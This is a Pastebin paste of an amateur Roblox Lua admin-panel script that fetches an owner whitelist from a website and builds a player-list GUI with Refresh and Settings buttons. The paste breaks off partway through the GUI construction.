jech

Untitled

Jun 15th, 2016
89
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 77.98 KB | None | 0 0
  1. local CoreValues = Instance.new("Folder")
  2. CoreValues.Name = "MGVXCore"
  3. CoreValues.Parent = game
  4.  
  5.  
  6. local Http = game:GetService("HttpService")
  7. local gWorkspace = game:GetService("Workspace")
  8. local OwnerGui = game:GetService("Players").LocalPlayer.PlayerGui
  9. local Website = "http://mgvx.tk/"
  10.  
  11. -- Makes Sure EveryThing Goes Ok!---
  12. print("MGVX LOADED")
  13.  
  14.  
  15. --------
  16. local WhiteList = Http:GetAsync(Website)
  17. local BlackListed = {}
  18. -- Variables---
  19. for i,v in pairs(game.Players:GetChildren()) do
  20. if string.find(WhiteList, ",") then
  21. local sep = true
  22. if string.find(WhiteList, v.UserId) then
  23. Owner = game.Players:FindFirstChild(v.Name)
  24.  
  25. end
  26.  
  27. end
  28. end
  29.  
  30. local plr = Owner
  31. for i,v in pairs(game.Players:GetChildren())do if v.Name ~= plr then otherp = v end end
  32.  
  33.  
  34. ------------Functions----------
  35. function GetPlr(plr, str)
  36. local plrz = {} str = str:lower()
  37. if str == "all" then plrz = game.Players:children()
  38. elseif str == "others" then for i, v in pairs(game.Players:children()) do if v ~= plr then table.insert(plrz, v) end end
  39. else
  40. local sn = {1} local en = {}
  41. for i = 1, #str do if str:sub(i,i) == "," then table.insert(sn, i+1) table.insert(en,i-1) end end
  42. for x = 1, #sn do
  43. if (sn[x] and en[x] and str:sub(sn[x],en[x]) == "me") or (sn[x] and str:sub(sn[x]) == "me") then table.insert(plrz, plr)
  44. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "random") or (sn[x] and str:sub(sn[x]) == "random") then table.insert(plrz, game.Players:children()[math.random(#game.Players:children())])
  45. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]):sub(1,4) == "team") then
  46. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x],en[x]):sub(6)) == 1 then
  47. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  48. end end end
  49. elseif (sn[x] and str:sub(sn[x]):sub(1,4):lower() == "team") then
  50. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x]):sub(6)) == 1 then
  51. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  52. end end end
  53. else
  54. for a, plyr in pairs(game.Players:children()) do
  55. if (sn[x] and en[x] and str:sub(sn[x],en[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x],en[x])) == 1) or (sn[x] and str:sub(sn[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x])) == 1) or (str ~= "" and plyr.Name:lower():find(str) == 1) then
  56. table.insert(plrz, plyr) break
  57. end
  58. end
  59. end
  60. end
  61. end
  62. return plrz
  63. end
  64.  
  65. function findPlayer(name)
  66. for _, player in ipairs(game.Players:GetPlayers()) do
  67. if player.Name:lower() == name:lower() then
  68. return player
  69. end
  70. end
  71. end
  72. function WriteTxt(obj,message)
  73. local q = obj.Text
  74. obj.Text = q..""..message..""
  75.  
  76. end
  77.  
  78. local OwnerV = Instance.new("StringValue")
  79. OwnerV.Name = "Owner"
  80. OwnerV.Value = Owner.Name
  81. OwnerV.Parent = CoreValues
  82.  
  83. local OtherP = Instance.new("StringValue")
  84. OtherP.Name = "OtherP"
  85. OtherP.Value = otherp.Name
  86. OtherP.Parent = CoreValues
  87.  
  88. local NewGuiPart1 = Instance.new("ScreenGui")
  89. NewGuiPart1.Name = "MGVX"
  90. NewGuiPart1.Parent = Owner.PlayerGui
  91.  
  92.  
  93.  
  94. -------
  95. local NewGuiPart2 = Instance.new("Frame")
  96. NewGuiPart2.Active = true
  97. NewGuiPart2.Position = UDim2.new(0.368000001, 0, 0.0829999968, 0)
  98. NewGuiPart2.Size = UDim2.new(0, 300, 0, 350)
  99. NewGuiPart2.Style = Enum.FrameStyle.DropShadow
  100. NewGuiPart2.ClipsDescendants = true
  101. NewGuiPart2.Draggable = true
  102. NewGuiPart2.Parent = NewGuiPart1
  103. -------
  104. local NewGuiPart3 = Instance.new("TextButton")
  105. NewGuiPart3.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  106. NewGuiPart3.BackgroundTransparency = 0.69999998807907
  107. NewGuiPart3.BorderColor3 = Color3.new(0, 0, 0)
  108. NewGuiPart3.BorderSizePixel = 0
  109. NewGuiPart3.Name = "TL1"
  110. NewGuiPart3.Position = UDim2.new(0, 200, 0, 0)
  111. NewGuiPart3.Selectable = true
  112. NewGuiPart3.Size = UDim2.new(0, 80, 0, 20)
  113. NewGuiPart3.Style = Enum.ButtonStyle.Custom
  114. NewGuiPart3.FontSize = Enum.FontSize.Size14
  115. NewGuiPart3.Text = "Refresh"
  116. NewGuiPart3.TextColor3 = Color3.new(1, 1, 1)
  117. NewGuiPart3.Parent = NewGuiPart2
  118. -------
  119. local NewGuiPart4 = Instance.new("TextLabel")
  120. NewGuiPart4.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  121. NewGuiPart4.BackgroundTransparency = 1
  122. NewGuiPart4.BorderColor3 = Color3.new(0, 0, 0)
  123. NewGuiPart4.BorderSizePixel = 0
  124. NewGuiPart4.Name = "TL2"
  125. NewGuiPart4.Position = UDim2.new(0, 50, 0, 0)
  126. NewGuiPart4.Size = UDim2.new(0, 80, 0, 20)
  127. NewGuiPart4.FontSize = Enum.FontSize.Size14
  128. NewGuiPart4.Text = "Loading..."
  129. NewGuiPart4.TextColor3 = Color3.new(1, 1, 1)
  130. NewGuiPart4.TextScaled = true
  131. NewGuiPart4.TextWrapped = true
  132. NewGuiPart4.Parent = NewGuiPart2
  133. -------
  134. local NewGuiPart5 = Instance.new("Frame")
  135. NewGuiPart5.BackgroundColor3 = Color3.new(0, 0, 0)
  136. NewGuiPart5.BackgroundTransparency = 1
  137. NewGuiPart5.BorderSizePixel = 5
  138. NewGuiPart5.Name = "Main"
  139. NewGuiPart5.Position = UDim2.new(1, -280, 0.0829999968, 0)
  140. NewGuiPart5.Size = UDim2.new(0, 250, 0, 300)
  141. NewGuiPart5.Visible = false
  142. NewGuiPart5.Draggable = true
  143. NewGuiPart5.Parent = NewGuiPart2
  144. -------
  145. local NewGuiPart6 = Instance.new("ScrollingFrame")
  146. NewGuiPart6.BackgroundTransparency = 1
  147. NewGuiPart6.Name = "PlayerList"
  148. NewGuiPart6.Position = UDim2.new(0, -7, 0, -10)
  149. NewGuiPart6.Selectable = true
  150. NewGuiPart6.Size = UDim2.new(0, 290, 0, 320)
  151. NewGuiPart6.ClipsDescendants = true
  152. NewGuiPart6.Parent = NewGuiPart5
  153. -------
  154. local NewGuiPart7 = Instance.new("Frame")
  155. NewGuiPart7.BackgroundColor3 = Color3.new(0, 0, 0)
  156. NewGuiPart7.BackgroundTransparency = 1
  157. NewGuiPart7.BorderSizePixel = 0
  158. NewGuiPart7.Size = UDim2.new(0, 290, 0, 35)
  159. NewGuiPart7.Parent = NewGuiPart6
  160. -------
  161. local NewGuiPart8 = Instance.new("ImageLabel")
  162. NewGuiPart8.Active = false
  163. NewGuiPart8.BackgroundTransparency = 1
  164. NewGuiPart8.BorderSizePixel = 0
  165. NewGuiPart8.Position = UDim2.new(0, 10, 0, 15)
  166. NewGuiPart8.Selectable = false
  167. NewGuiPart8.Size = UDim2.new(0, 65, 0, 25)
  168. NewGuiPart8.Image = "http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username=ROBLOX"
  169. NewGuiPart8.Parent = NewGuiPart7
  170. -------
  171. local NewGuiPart9 = Instance.new("TextLabel")
  172. NewGuiPart9.BackgroundTransparency = 1
  173. NewGuiPart9.BorderSizePixel = 0
  174. NewGuiPart9.Position = UDim2.new(0, 100, 0, 15)
  175. NewGuiPart9.Size = UDim2.new(0, 100, 0, 25)
  176. NewGuiPart9.Font = Enum.Font.Legacy
  177. NewGuiPart9.FontSize = Enum.FontSize.Size10
  178. NewGuiPart9.Text = ""
  179. NewGuiPart9.TextColor3 = Color3.new(1, 1, 1)
  180. NewGuiPart9.TextScaled = true
  181. NewGuiPart9.TextWrapped = true
  182. NewGuiPart9.Parent = NewGuiPart7
  183. -------
  184. local NewGuiPart10 = Instance.new("Frame")
  185. NewGuiPart10.BackgroundColor3 = Color3.new(0, 0, 0)
  186. NewGuiPart10.BackgroundTransparency = 1
  187. NewGuiPart10.BorderSizePixel = 0
  188. NewGuiPart10.Position = UDim2.new(0, 0, 0, 35)
  189. NewGuiPart10.Size = UDim2.new(0, 290, 0, 35)
  190. NewGuiPart10.Parent = NewGuiPart6
  191. -------
  192. local NewGuiPart11 = Instance.new("ImageLabel")
  193. NewGuiPart11.Active = false
  194. NewGuiPart11.BackgroundTransparency = 1
  195. NewGuiPart11.BorderSizePixel = 0
  196. NewGuiPart11.Position = UDim2.new(0, 10, 0, 15)
  197. NewGuiPart11.Selectable = false
  198. NewGuiPart11.Size = UDim2.new(0, 65, 0, 25)
  199. NewGuiPart11.Image = ""
  200. NewGuiPart11.Parent = NewGuiPart10
  201. -------
  202. local NewGuiPart12 = Instance.new("TextLabel")
  203. NewGuiPart12.BackgroundTransparency = 1
  204. NewGuiPart12.BorderSizePixel = 0
  205. NewGuiPart12.Position = UDim2.new(0, 100, 0, 15)
  206. NewGuiPart12.Size = UDim2.new(0, 100, 0, 25)
  207. NewGuiPart12.Font = Enum.Font.Legacy
  208. NewGuiPart12.FontSize = Enum.FontSize.Size10
  209. NewGuiPart12.Text = ""
  210. NewGuiPart12.TextColor3 = Color3.new(1, 1, 1)
  211. NewGuiPart12.TextScaled = true
  212. NewGuiPart12.TextWrapped = true
  213. NewGuiPart12.Parent = NewGuiPart10
  214. -------
  215. local NewGuiPart13 = Instance.new("Frame")
  216. NewGuiPart13.BackgroundColor3 = Color3.new(0, 0, 0)
  217. NewGuiPart13.BackgroundTransparency = 1
  218. NewGuiPart13.BorderSizePixel = 0
  219. NewGuiPart13.Position = UDim2.new(0, 0, 0, 70)
  220. NewGuiPart13.Size = UDim2.new(0, 290, 0, 35)
  221. NewGuiPart13.Parent = NewGuiPart6
  222. -------
  223. local NewGuiPart14 = Instance.new("ImageLabel")
  224. NewGuiPart14.Active = false
  225. NewGuiPart14.BackgroundTransparency = 1
  226. NewGuiPart14.BorderSizePixel = 0
  227. NewGuiPart14.Position = UDim2.new(0, 10, 0, 15)
  228. NewGuiPart14.Selectable = false
  229. NewGuiPart14.Size = UDim2.new(0, 65, 0, 25)
  230. NewGuiPart14.Image = ""
  231. NewGuiPart14.Image = ""
  232. NewGuiPart14.Parent = NewGuiPart13
  233. -------
  234. local NewGuiPart15 = Instance.new("TextLabel")
  235. NewGuiPart15.BackgroundTransparency = 1
  236. NewGuiPart15.BorderSizePixel = 0
  237. NewGuiPart15.Position = UDim2.new(0, 100, 0, 15)
  238. NewGuiPart15.Size = UDim2.new(0, 100, 0, 25)
  239. NewGuiPart15.Font = Enum.Font.Legacy
  240. NewGuiPart15.FontSize = Enum.FontSize.Size10
  241. NewGuiPart15.Text = ""
  242. NewGuiPart15.TextColor3 = Color3.new(1, 1, 1)
  243. NewGuiPart15.TextScaled = true
  244. NewGuiPart15.TextWrapped = true
  245. NewGuiPart15.Parent = NewGuiPart13
  246. -------
  247. local NewGuiPart16 = Instance.new("Frame")
  248. NewGuiPart16.BackgroundColor3 = Color3.new(0, 0, 0)
  249. NewGuiPart16.BackgroundTransparency = 1
  250. NewGuiPart16.BorderSizePixel = 0
  251. NewGuiPart16.Position = UDim2.new(0, 0, 0, 105)
  252. NewGuiPart16.Size = UDim2.new(0, 290, 0, 35)
  253. NewGuiPart16.Parent = NewGuiPart6
  254. -------
  255. local NewGuiPart17 = Instance.new("ImageLabel")
  256. NewGuiPart17.Active = false
  257. NewGuiPart17.BackgroundTransparency = 1
  258. NewGuiPart17.BorderSizePixel = 0
  259. NewGuiPart17.Position = UDim2.new(0, 10, 0, 15)
  260. NewGuiPart17.Selectable = false
  261. NewGuiPart17.Size = UDim2.new(0, 65, 0, 25)
  262. NewGuiPart17.Image = ""
  263. NewGuiPart17.Image = ""
  264. NewGuiPart17.Parent = NewGuiPart16
  265. -------
  266. local NewGuiPart18 = Instance.new("TextLabel")
  267. NewGuiPart18.BackgroundTransparency = 1
  268. NewGuiPart18.BorderSizePixel = 0
  269. NewGuiPart18.Position = UDim2.new(0, 100, 0, 15)
  270. NewGuiPart18.Size = UDim2.new(0, 100, 0, 25)
  271. NewGuiPart18.Font = Enum.Font.Legacy
  272. NewGuiPart18.FontSize = Enum.FontSize.Size10
  273. NewGuiPart18.Text = ""
  274. NewGuiPart18.TextColor3 = Color3.new(1, 1, 1)
  275. NewGuiPart18.TextScaled = true
  276. NewGuiPart18.TextWrapped = true
  277. NewGuiPart18.Parent = NewGuiPart16
  278. -------
  279. local NewGuiPart19 = Instance.new("Frame")
  280. NewGuiPart19.BackgroundColor3 = Color3.new(0, 0, 0)
  281. NewGuiPart19.BackgroundTransparency = 1
  282. NewGuiPart19.BorderSizePixel = 0
  283. NewGuiPart19.Position = UDim2.new(0, 0, 0, 140)
  284. NewGuiPart19.Size = UDim2.new(0, 290, 0, 35)
  285. NewGuiPart19.Parent = NewGuiPart6
  286. -------
  287. local NewGuiPart20 = Instance.new("ImageLabel")
  288. NewGuiPart20.Active = false
  289. NewGuiPart20.BackgroundTransparency = 1
  290. NewGuiPart20.BorderSizePixel = 0
  291. NewGuiPart20.Position = UDim2.new(0, 10, 0, 15)
  292. NewGuiPart20.Selectable = false
  293. NewGuiPart20.Size = UDim2.new(0, 65, 0, 25)
  294. NewGuiPart20.Image = ""
  295. NewGuiPart20.Image = ""
  296. NewGuiPart20.Parent = NewGuiPart19
  297. -------
  298. local NewGuiPart21 = Instance.new("TextLabel")
  299. NewGuiPart21.BackgroundTransparency = 1
  300. NewGuiPart21.BorderSizePixel = 0
  301. NewGuiPart21.Position = UDim2.new(0, 100, 0, 15)
  302. NewGuiPart21.Size = UDim2.new(0, 100, 0, 25)
  303. NewGuiPart21.Font = Enum.Font.Legacy
  304. NewGuiPart21.FontSize = Enum.FontSize.Size10
  305. NewGuiPart21.Text = ""
  306. NewGuiPart21.TextColor3 = Color3.new(1, 1, 1)
  307. NewGuiPart21.TextScaled = true
  308. NewGuiPart21.TextWrapped = true
  309. NewGuiPart21.Parent = NewGuiPart19
  310. -------
  311. local NewGuiPart22 = Instance.new("Frame")
  312. NewGuiPart22.BackgroundColor3 = Color3.new(0, 0, 0)
  313. NewGuiPart22.BackgroundTransparency = 1
  314. NewGuiPart22.BorderSizePixel = 0
  315. NewGuiPart22.Position = UDim2.new(0, 0, 0, 175)
  316. NewGuiPart22.Size = UDim2.new(0, 290, 0, 35)
  317. NewGuiPart22.Parent = NewGuiPart6
  318. -------
  319. local NewGuiPart23 = Instance.new("ImageLabel")
  320. NewGuiPart23.Active = false
  321. NewGuiPart23.BackgroundTransparency = 1
  322. NewGuiPart23.BorderSizePixel = 0
  323. NewGuiPart23.Position = UDim2.new(0, 10, 0, 15)
  324. NewGuiPart23.Selectable = false
  325. NewGuiPart23.Size = UDim2.new(0, 65, 0, 25)
  326. NewGuiPart23.Image = ""
  327. NewGuiPart23.Image = ""
  328. NewGuiPart23.Parent = NewGuiPart22
  329. -------
  330. local NewGuiPart24 = Instance.new("TextLabel")
  331. NewGuiPart24.BackgroundTransparency = 1
  332. NewGuiPart24.BorderSizePixel = 0
  333. NewGuiPart24.Position = UDim2.new(0, 100, 0, 15)
  334. NewGuiPart24.Size = UDim2.new(0, 100, 0, 25)
  335. NewGuiPart24.Font = Enum.Font.Legacy
  336. NewGuiPart24.FontSize = Enum.FontSize.Size10
  337. NewGuiPart24.Text = ""
  338. NewGuiPart24.TextColor3 = Color3.new(1, 1, 1)
  339. NewGuiPart24.TextScaled = true
  340. NewGuiPart24.TextWrapped = true
  341. NewGuiPart24.Parent = NewGuiPart22
  342. -------
  343. local NewGuiPart25 = Instance.new("Frame")
  344. NewGuiPart25.BackgroundColor3 = Color3.new(0, 0, 0)
  345. NewGuiPart25.BackgroundTransparency = 1
  346. NewGuiPart25.BorderSizePixel = 0
  347. NewGuiPart25.Position = UDim2.new(0, 0, 0, 205)
  348. NewGuiPart25.Size = UDim2.new(0, 290, 0, 35)
  349. NewGuiPart25.Parent = NewGuiPart6
  350. -------
  351. local NewGuiPart26 = Instance.new("ImageLabel")
  352. NewGuiPart26.Active = false
  353. NewGuiPart26.BackgroundTransparency = 1
  354. NewGuiPart26.BorderSizePixel = 0
  355. NewGuiPart26.Position = UDim2.new(0, 10, 0, 15)
  356. NewGuiPart26.Selectable = false
  357. NewGuiPart26.Size = UDim2.new(0, 65, 0, 25)
  358. NewGuiPart26.Image = ""
  359. NewGuiPart26.Image = ""
  360. NewGuiPart26.Parent = NewGuiPart25
  361. -------
  362. local NewGuiPart27 = Instance.new("TextLabel")
  363. NewGuiPart27.BackgroundTransparency = 1
  364. NewGuiPart27.BorderSizePixel = 0
  365. NewGuiPart27.Position = UDim2.new(0, 100, 0, 15)
  366. NewGuiPart27.Size = UDim2.new(0, 100, 0, 25)
  367. NewGuiPart27.Font = Enum.Font.Legacy
  368. NewGuiPart27.FontSize = Enum.FontSize.Size10
  369. NewGuiPart27.Text = ""
  370. NewGuiPart27.TextColor3 = Color3.new(1, 1, 1)
  371. NewGuiPart27.TextScaled = true
  372. NewGuiPart27.TextWrapped = true
  373. NewGuiPart27.Parent = NewGuiPart25
  374. -------
  375. local NewGuiPart28 = Instance.new("Frame")
  376. NewGuiPart28.BackgroundColor3 = Color3.new(0, 0, 0)
  377. NewGuiPart28.BackgroundTransparency = 1
  378. NewGuiPart28.BorderSizePixel = 0
  379. NewGuiPart28.Position = UDim2.new(0, 0, 0, 240)
  380. NewGuiPart28.Size = UDim2.new(0, 290, 0, 35)
  381. NewGuiPart28.Parent = NewGuiPart6
  382. -------
  383. local NewGuiPart29 = Instance.new("ImageLabel")
  384. NewGuiPart29.Active = false
  385. NewGuiPart29.BackgroundTransparency = 1
  386. NewGuiPart29.BorderSizePixel = 0
  387. NewGuiPart29.Position = UDim2.new(0, 10, 0, 15)
  388. NewGuiPart29.Selectable = false
  389. NewGuiPart29.Size = UDim2.new(0, 65, 0, 25)
  390. NewGuiPart29.Image = ""
  391. NewGuiPart29.Image = ""
  392. NewGuiPart29.Parent = NewGuiPart28
  393. -------
  394. local NewGuiPart30 = Instance.new("TextLabel")
  395. NewGuiPart30.BackgroundTransparency = 1
  396. NewGuiPart30.BorderSizePixel = 0
  397. NewGuiPart30.Position = UDim2.new(0, 100, 0, 15)
  398. NewGuiPart30.Size = UDim2.new(0, 100, 0, 25)
  399. NewGuiPart30.Font = Enum.Font.Legacy
  400. NewGuiPart30.FontSize = Enum.FontSize.Size10
  401. NewGuiPart30.Text = ""
  402. NewGuiPart30.TextColor3 = Color3.new(1, 1, 1)
  403. NewGuiPart30.TextScaled = true
  404. NewGuiPart30.TextWrapped = true
  405. NewGuiPart30.Parent = NewGuiPart28
  406. -------
  407. local NewGuiPart31 = Instance.new("Frame")
  408. NewGuiPart31.BackgroundColor3 = Color3.new(0, 0, 0)
  409. NewGuiPart31.BackgroundTransparency = 1
  410. NewGuiPart31.BorderSizePixel = 0
  411. NewGuiPart31.Position = UDim2.new(0, 0, 0, 275)
  412. NewGuiPart31.Size = UDim2.new(0, 290, 0, 35)
  413. NewGuiPart31.Parent = NewGuiPart6
  414. -------
  415. local NewGuiPart32 = Instance.new("ImageLabel")
  416. NewGuiPart32.Active = false
  417. NewGuiPart32.BackgroundTransparency = 1
  418. NewGuiPart32.BorderSizePixel = 0
  419. NewGuiPart32.Position = UDim2.new(0, 10, 0, 15)
  420. NewGuiPart32.Selectable = false
  421. NewGuiPart32.Size = UDim2.new(0, 65, 0, 25)
  422. NewGuiPart32.Image = ""
  423. NewGuiPart32.Image = ""
  424. NewGuiPart32.Parent = NewGuiPart31
  425. -------
  426. local NewGuiPart33 = Instance.new("TextLabel")
  427. NewGuiPart33.BackgroundTransparency = 1
  428. NewGuiPart33.BorderSizePixel = 0
  429. NewGuiPart33.Position = UDim2.new(0, 100, 0, 15)
  430. NewGuiPart33.Size = UDim2.new(0, 100, 0, 25)
  431. NewGuiPart33.Font = Enum.Font.Legacy
  432. NewGuiPart33.FontSize = Enum.FontSize.Size10
  433. NewGuiPart33.Text = ""
  434. NewGuiPart33.TextColor3 = Color3.new(1, 1, 1)
  435. NewGuiPart33.TextScaled = true
  436. NewGuiPart33.TextWrapped = true
  437. NewGuiPart33.Parent = NewGuiPart31
  438. -------
  439. local NewGuiPart34 = Instance.new("Frame")
  440. NewGuiPart34.BackgroundColor3 = Color3.new(0, 0, 0)
  441. NewGuiPart34.BackgroundTransparency = 1
  442. NewGuiPart34.BorderSizePixel = 0
  443. NewGuiPart34.Position = UDim2.new(0, 0, 0, 305)
  444. NewGuiPart34.Size = UDim2.new(0, 290, 0, 35)
  445. NewGuiPart34.Parent = NewGuiPart6
  446. -------
  447. local NewGuiPart35 = Instance.new("ImageLabel")
  448. NewGuiPart35.Active = false
  449. NewGuiPart35.BackgroundTransparency = 1
  450. NewGuiPart35.BorderSizePixel = 0
  451. NewGuiPart35.Position = UDim2.new(0, 10, 0, 15)
  452. NewGuiPart35.Selectable = false
  453. NewGuiPart35.Size = UDim2.new(0, 65, 0, 25)
  454. NewGuiPart35.Image = ""
  455. NewGuiPart35.Image = ""
  456. NewGuiPart35.Parent = NewGuiPart34
  457. -------
  458. local NewGuiPart36 = Instance.new("TextLabel")
  459. NewGuiPart36.BackgroundTransparency = 1
  460. NewGuiPart36.BorderSizePixel = 0
  461. NewGuiPart36.Position = UDim2.new(0, 100, 0, 15)
  462. NewGuiPart36.Size = UDim2.new(0, 100, 0, 25)
  463. NewGuiPart36.Font = Enum.Font.Legacy
  464. NewGuiPart36.FontSize = Enum.FontSize.Size10
  465. NewGuiPart36.Text = ""
  466. NewGuiPart36.TextColor3 = Color3.new(1, 1, 1)
  467. NewGuiPart36.TextScaled = true
  468. NewGuiPart36.TextWrapped = true
  469. NewGuiPart36.Parent = NewGuiPart34
  470. -------
  471. local NewGuiPart37 = Instance.new("Frame")
  472. NewGuiPart37.BackgroundColor3 = Color3.new(0, 0, 0)
  473. NewGuiPart37.BackgroundTransparency = 1
  474. NewGuiPart37.BorderSizePixel = 0
  475. NewGuiPart37.Position = UDim2.new(0, 0, 0, 345)
  476. NewGuiPart37.Size = UDim2.new(0, 290, 0, 35)
  477. NewGuiPart37.Parent = NewGuiPart6
  478. -------
  479. local NewGuiPart38 = Instance.new("ImageLabel")
  480. NewGuiPart38.Active = false
  481. NewGuiPart38.BackgroundTransparency = 1
  482. NewGuiPart38.BorderSizePixel = 0
  483. NewGuiPart38.Position = UDim2.new(0, 10, 0, 15)
  484. NewGuiPart38.Selectable = false
  485. NewGuiPart38.Size = UDim2.new(0, 65, 0, 25)
  486. NewGuiPart38.Image = ""
  487. NewGuiPart38.Image = ""
  488. NewGuiPart38.Parent = NewGuiPart37
  489. -------
  490. local NewGuiPart39 = Instance.new("TextLabel")
  491. NewGuiPart39.BackgroundTransparency = 1
  492. NewGuiPart39.BorderSizePixel = 0
  493. NewGuiPart39.Position = UDim2.new(0, 100, 0, 15)
  494. NewGuiPart39.Size = UDim2.new(0, 100, 0, 25)
  495. NewGuiPart39.Font = Enum.Font.Legacy
  496. NewGuiPart39.FontSize = Enum.FontSize.Size10
  497. NewGuiPart39.Text = ""
  498. NewGuiPart39.TextColor3 = Color3.new(1, 1, 1)
  499. NewGuiPart39.TextScaled = true
  500. NewGuiPart39.TextWrapped = true
  501. NewGuiPart39.Parent = NewGuiPart37
  502. -------
  503. local NewGuiPart40 = Instance.new("Frame")
  504. NewGuiPart40.BackgroundColor3 = Color3.new(0, 0, 0)
  505. NewGuiPart40.BackgroundTransparency = 1
  506. NewGuiPart40.BorderSizePixel = 0
  507. NewGuiPart40.Position = UDim2.new(0, 0, 0, 375)
  508. NewGuiPart40.Size = UDim2.new(0, 290, 0, 35)
  509. NewGuiPart40.Parent = NewGuiPart6
  510. -------
  511. local NewGuiPart41 = Instance.new("ImageLabel")
  512. NewGuiPart41.Active = false
  513. NewGuiPart41.BackgroundTransparency = 1
  514. NewGuiPart41.BorderSizePixel = 0
  515. NewGuiPart41.Position = UDim2.new(0, 10, 0, 15)
  516. NewGuiPart41.Selectable = false
  517. NewGuiPart41.Size = UDim2.new(0, 65, 0, 25)
  518. NewGuiPart41.Image = ""
  519. NewGuiPart41.Image = ""
  520. NewGuiPart41.Parent = NewGuiPart40
  521. -------
  522. local NewGuiPart42 = Instance.new("TextLabel")
  523. NewGuiPart42.BackgroundTransparency = 1
  524. NewGuiPart42.BorderSizePixel = 0
  525. NewGuiPart42.Position = UDim2.new(0, 100, 0, 15)
  526. NewGuiPart42.Size = UDim2.new(0, 100, 0, 25)
  527. NewGuiPart42.Font = Enum.Font.Legacy
  528. NewGuiPart42.FontSize = Enum.FontSize.Size10
  529. NewGuiPart42.Text = ""
  530. NewGuiPart42.TextColor3 = Color3.new(1, 1, 1)
  531. NewGuiPart42.TextScaled = true
  532. NewGuiPart42.TextWrapped = true
  533. NewGuiPart42.Parent = NewGuiPart40
  534. -------
  535. local NewGuiPart43 = Instance.new("Frame")
  536. NewGuiPart43.BackgroundColor3 = Color3.new(0, 0, 0)
  537. NewGuiPart43.BackgroundTransparency = 1
  538. NewGuiPart43.BorderSizePixel = 0
  539. NewGuiPart43.Position = UDim2.new(0, 0, 0, 405)
  540. NewGuiPart43.Size = UDim2.new(0, 290, 0, 35)
  541. NewGuiPart43.Parent = NewGuiPart6
  542. -------
  543. local NewGuiPart44 = Instance.new("ImageLabel")
  544. NewGuiPart44.Active = false
  545. NewGuiPart44.BackgroundTransparency = 1
  546. NewGuiPart44.BorderSizePixel = 0
  547. NewGuiPart44.Position = UDim2.new(0, 10, 0, 15)
  548. NewGuiPart44.Selectable = false
  549. NewGuiPart44.Size = UDim2.new(0, 65, 0, 25)
  550. NewGuiPart44.Image = ""
  551. NewGuiPart44.Image = ""
  552. NewGuiPart44.Parent = NewGuiPart43
  553. -------
  554. local NewGuiPart45 = Instance.new("TextLabel")
  555. NewGuiPart45.BackgroundTransparency = 1
  556. NewGuiPart45.BorderSizePixel = 0
  557. NewGuiPart45.Position = UDim2.new(0, 100, 0, 15)
  558. NewGuiPart45.Size = UDim2.new(0, 100, 0, 25)
  559. NewGuiPart45.Font = Enum.Font.Legacy
  560. NewGuiPart45.FontSize = Enum.FontSize.Size10
  561. NewGuiPart45.Text = ""
  562. NewGuiPart45.TextColor3 = Color3.new(1, 1, 1)
  563. NewGuiPart45.TextScaled = true
  564. NewGuiPart45.TextWrapped = true
  565. NewGuiPart45.Parent = NewGuiPart43
  566. -------
  567. local NewGuiPart46 = Instance.new("Frame")
  568. NewGuiPart46.BackgroundColor3 = Color3.new(0, 0, 0)
  569. NewGuiPart46.BackgroundTransparency = 1
  570. NewGuiPart46.BorderSizePixel = 0
  571. NewGuiPart46.Position = UDim2.new(0, 0, 0, 445)
  572. NewGuiPart46.Size = UDim2.new(0, 290, 0, 35)
  573. NewGuiPart46.Parent = NewGuiPart6
  574. -------
  575. local NewGuiPart47 = Instance.new("ImageLabel")
  576. NewGuiPart47.Active = false
  577. NewGuiPart47.BackgroundTransparency = 1
  578. NewGuiPart47.BorderSizePixel = 0
  579. NewGuiPart47.Position = UDim2.new(0, 10, 0, 15)
  580. NewGuiPart47.Selectable = false
  581. NewGuiPart47.Size = UDim2.new(0, 65, 0, 25)
  582. NewGuiPart47.Image = ""
  583. NewGuiPart47.Image = ""
  584. NewGuiPart47.Parent = NewGuiPart46
  585. -------
  586. local NewGuiPart48 = Instance.new("TextLabel")
  587. NewGuiPart48.BackgroundTransparency = 1
  588. NewGuiPart48.BorderSizePixel = 0
  589. NewGuiPart48.Position = UDim2.new(0, 100, 0, 15)
  590. NewGuiPart48.Size = UDim2.new(0, 100, 0, 25)
  591. NewGuiPart48.Font = Enum.Font.Legacy
  592. NewGuiPart48.FontSize = Enum.FontSize.Size10
  593. NewGuiPart48.Text = ""
  594. NewGuiPart48.TextColor3 = Color3.new(1, 1, 1)
  595. NewGuiPart48.TextScaled = true
  596. NewGuiPart48.TextWrapped = true
  597. NewGuiPart48.Parent = NewGuiPart46
  598. -------
  599. local NewGuiPart49 = Instance.new("TextButton")
  600. NewGuiPart49.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  601. NewGuiPart49.BackgroundTransparency = 0.69999998807907
  602. NewGuiPart49.BorderColor3 = Color3.new(0, 0, 0)
  603. NewGuiPart49.BorderSizePixel = 0
  604. NewGuiPart49.Name = "TL3"
  605. NewGuiPart49.Position = UDim2.new(0, 200, 0, 25)
  606. NewGuiPart49.Selectable = true
  607. NewGuiPart49.Size = UDim2.new(0, 80, 0, 20)
  608. NewGuiPart49.Style = Enum.ButtonStyle.Custom
  609. NewGuiPart49.FontSize = Enum.FontSize.Size14
  610. NewGuiPart49.Text = "Settings"
  611. NewGuiPart49.TextColor3 = Color3.new(1, 1, 1)
  612. NewGuiPart49.Parent = NewGuiPart2
  613. -------
  614. local NewGuiPart50 = Instance.new("Frame")
  615. NewGuiPart50.BackgroundTransparency = 1
  616. NewGuiPart50.Name = "ScrollingFrame"
  617. NewGuiPart50.Position = UDim2.new(0, 0, 0, 50)
